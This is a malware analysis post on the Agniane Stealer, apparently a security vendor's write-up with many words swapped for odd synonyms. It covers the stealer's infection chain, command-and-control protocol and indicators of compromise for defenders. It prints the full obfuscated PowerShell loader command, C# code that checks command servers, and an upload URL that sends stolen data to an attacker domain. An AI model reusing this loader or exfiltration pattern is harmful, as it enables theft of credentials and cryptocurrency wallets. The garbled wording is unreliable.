Agniane Stealer: Information stealer concentrating on cryptocurrency customers

0
351
Agniane Stealer: Information stealer concentrating on cryptocurrency customers


The Agniane Stealer is an information-stealing malware primarily concentrating on the cryptocurrency wallets of its victims. It gained reputation on the web beginning in August 2023. Recently, we’ve noticed a definite marketing campaign spreading it throughout our telemetry. Our latest examine has led to the profitable identification and detailed evaluation of a beforehand unrecognized community URL sample. Our researchers have just lately uncovered extra data on the malware’s strategies for file assortment and the intricacies of its command and management (C2) protocol. We even have new reverse engineering insights into the malware’s structure and communication.

We imagine our work contributes to tactical and operational ranges of intelligence relating to Agniane Stealer. It can show helpful from incident response to detector improvement and can be extra appropriate for a technical viewers.

The Agniane Stealer has already been referenced in a number of articles. The Agniane stealer malware is being actively marketed and bought via a Telegram channel, accessible at t[.]me/agniane. Potential consumers could make purchases straight through this channel by interacting with a specialised bot, named @agnianebot, which facilitates the transaction course of and supplies extra details about the malware.” Our technical evaluation signifies that it makes use of the ConfuserEx Protector and goals at equivalent targets. However, it employs a definite C2 technique, based mostly on the pattern noticed in our telemetry information. Therefore, we’ve determined to publish a technical evaluation of the pattern.

Introduction

During our threat-hunting workout routines in November 2023, we’ve observed a sample of renamed PowerShell binaries, known as passbook.bat.exe. On nearer inspection of the host machines, we’ve recognized infections of the newly found malware household of Agniane Stealer. Threat analysis Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] finally adopted up with weblog posts of their very own. Our work goals to contribute extra data understanding campaigns involving using Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected appear to begin with the downloading of ZIP information from compromised web sites. All the web sites from the place we’ve seen the obtain of this file in our telemetry are regular web sites with reliable content material. All obtain URLs had the beneath URL sample:

http[s]://<area identify>/book_[A-Z0-9]+-d+.zip

Once downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and extra ZIP file on the file system. The BAT file comprises an obfuscated payload and after its execution via cmd.exe, it drops an executable which is renamed model of PowerShell binary (passbook.bat.exe). [4]

This enamed PowerShell was used to execute collection of obfuscated instructions.

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat’).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Length – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line proven above performs the next actions:

  • Reads the content material of the beforehand extracted BAT file (passbook.bat).
  • Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
  • Converted payload and static key from Base64 to a byte array.
  • XOR’d the payload utilizing a static key.
  • Decompressed XOR’d payload utilizing GZIP.
  • Invokes payload after reflectively loading it into reminiscence.

To perceive actions taken towards the target, we reversed the payload.

Binary Analysis

The invoked payload continues with the execution of a C# meeting. We have dumped it right into a file, the place we get the executable with beneath hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the evaluation, the file was unknown to on-line sandboxes. We have determined to emulate the exercise on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic evaluation couldn’t be accomplished as we didn’t execute the primary stage of the pattern of the malware. Therefore, we determined to investigate the pattern manually, the place we discovered later there are anti-sandbox strategies used.

The binary file was extremely obfuscated with management circulate manipulations, like ConfuserEx.

Content of the passbook.bat file. Control circulate obfuscation like ConfuserEx.

It is essential to notice that the pattern didn’t comprise a signature for ConfuserEx, but it had an obfuscation technique that resembled it.

After reversing the pattern, we realized it comprises one other binary file in its assets part, which have been getting reflectively loaded. The new binary was one other C#-based pattern, which contained the ultimate payload. It was obfuscated with ConfuserEx with direct signatures.

Content of the passbook.bat file. Control circulate obfuscation like ConfuserEx.
The C# file calling Invoke operate for in reminiscence loading and executions, a typical method to reflective loading of assets information.

As you may see from the earlier screenshot, it’s calling Invoke features from an entry Point object, which comprises a parsed useful resource.

Loading useful resource information from malicious pattern, which is later executed within the reminiscence. The begin of the execution is within the picture above.

The total loading course of seems as if passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in flip, is working the tmp385C.tmp (tmp385C.tmp is only a header file identify) C# purposes, which reflectively load the _CASH_78 C# software. The last software on this sequence is the Agniane Stealer:

Malware execution chain. _CASH_78 is the ultimate payload. The earlier steps have been used just for obfuscations. There have been a number of phases of pattern to lastly loading _CASH_78 app. _CASH_78 app is last malware, phases earlier than are used just for supply, obfuscations or detection evasion.

Command and Control

The Agniane Stealer operates in an easy but environment friendly method, stealing credentials and information from the endpoint utilizing a fundamental C2 protocol. Initially, it verifies the provision of any domains via a easy C# net request, checking if the return worth is “13.” This time request was made to a URL labeled “test,” for example.

WebClient wc = new WebClient();

urlData = wc.DownloadString(“https://trecube[.]com/test”);

If urlData == “13” {

list_of_active_c2.Add(“trecube[.]com”)

proceed;

}

In our pattern, we will see the next IOCs (indicators of compromise) introduced in assets file:

trecube[.]com

trecube13[.]ru

imitato23[.]retailer

wood100home[.]ru

For all these domains, the pattern is asking for a check URL.

Later, the malware calls C2 to get a listing of file extensions to search for. This is positioned at URL sample getext?id= adopted by an ID – part of assets of the _CASH_78 file. On this web site, the checklist of extensions is separated by a semicolon, and for instance on an internet site trecube[.]retailer it appears to be like like:

*.txt; *.doc; *.docx; *.pockets; *seed*

Again, that is dealt with as earlier checking string within the code. It is parsed/cut up by semicolon and a listing of extensions is created in a listing of variables in C# code.

The Code dealing with through dynamic evaluation, via which we recognized the C2 URL as a breakpoint for DownloadString.

Subsequently, the malware requests a distant json file containing the small print about errors, VirusTotal hits, and so on. Based on this data, the pattern both progresses or halts. We selected to focus our investigation on different features which are extra straight related to attribution and detection settings. However, it is very important notice that the URL sample will be utilized for monitoring malware via telemetry or on-line sandbox providers for OSINT functions. The URL appears to be like like:

hxxps://trecube13[.]ru/getjson?id=67

And right here what its corresponding output appears to be like like:

{

“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

}

The subsequent stage includes enumeration and assortment. It scans the pc to gather all paperwork with specified extensions instructed by the URL with a “getext” sample, together with different credentials present in widespread paths of the working system, akin to Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a typical exercise amongst data stealer malware. Additionally, Agniane was checking to see the localization setting of the sufferer pc. If it comprises any of the language packages beneath, it doesn’t proceed with the an infection,

 

ru-RU

kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of some areas also can imply the developer doesn’t wish to assault particular areas. Based on different observations it’s doable to count on the attacker is from a rustic with a robust diplomatic tie to Russia.

Once all of the goal information are collected, the malware creates a ZIP archive underneath the “local application data” folder,

C:Users[user]AppDataLocal[A-Z0-9]{32}

Below is the construction/content material of this archive file

Agniane Stealer.txt //added as attachement right here

Installe Apps.txt //added as attachement right here

PC Information.txt //added as attachement right here

Files from Desktop //FOLDER – comprises exfiltrated information from Desktop folder

Files from … //FOLDER – comprises exfiltrated information from …

 

… //and different folders, which comprise exfiltrated information.

It is later uploaded to

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you will discover the illustrated model of the Agniane Stealer’s C2 communication,

The C2 communication protocol.

Other TTPs

The Agniane Stealer was additionally seen performing following actions:

  • Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for put in purposes, it additionally collects this data.
  • Checking for a public IP on a ip-api.com, i.e,
    https://ip-api.com/json/?fields=11827
  • Dumping Bitcoin and different cryptocurrency wallets
  • Performing (not properly) checks to see if it’s working in a debugged or digital env. and so on.
  • Collecting pockets.dat information.
  • Enumerating Profile and User information.
  • Collecting saved bank cards.
  • Adding different malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to stay undetected via varied obfuscation and anti-VM/debug strategies. It reveals widespread habits for stealers akin to amassing and exfiltrating information, credentials password, bank card particulars, wallets, and so on. Its evasive nature and concentrating on of varied data would possibly appeal to extra adversaries in future to leverage its providers.

Kill Chain

Kill Chain Activity TTP
Weaponization Use of PowerShell, ZIP file, batch file T1059.005
T1059.001
Delivery ZIP file downloaded by the browser T1204.002
Use of compromised web sites T1584.004
Exploitation Running Obfuscated PowerShell payload T1059.001
T1027.010
PowerShell decrypts payload utilizing XOR and decompress utilizing Gunzip T1140
T1059.001
Reflective loading of the payload via Powershell T1059.001
T1204.002
T1620
Use of Renamed PowerShell T1036.003
Installation
Command and Control
Actions on Objectives Collection of varied data from the host T1119
Targeting of credentials T1555

Indicators of Compromise

Type Stage IOC (indicators of compromise)
File Hash Delivery 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash Delivery e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash Delivery b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain C2 trecube[.]com
Domain C2 trecube[.]retailer
Domain C2 trecube13[.]ru
Domain C2 imitato23[.]retailer
Domain C2 wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer


We’d love to listen to what you suppose. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

Instagram
Facebook
Twitter
LinkedIn

Share:



LEAVE A REPLY

Please enter your comment!
Please enter your name here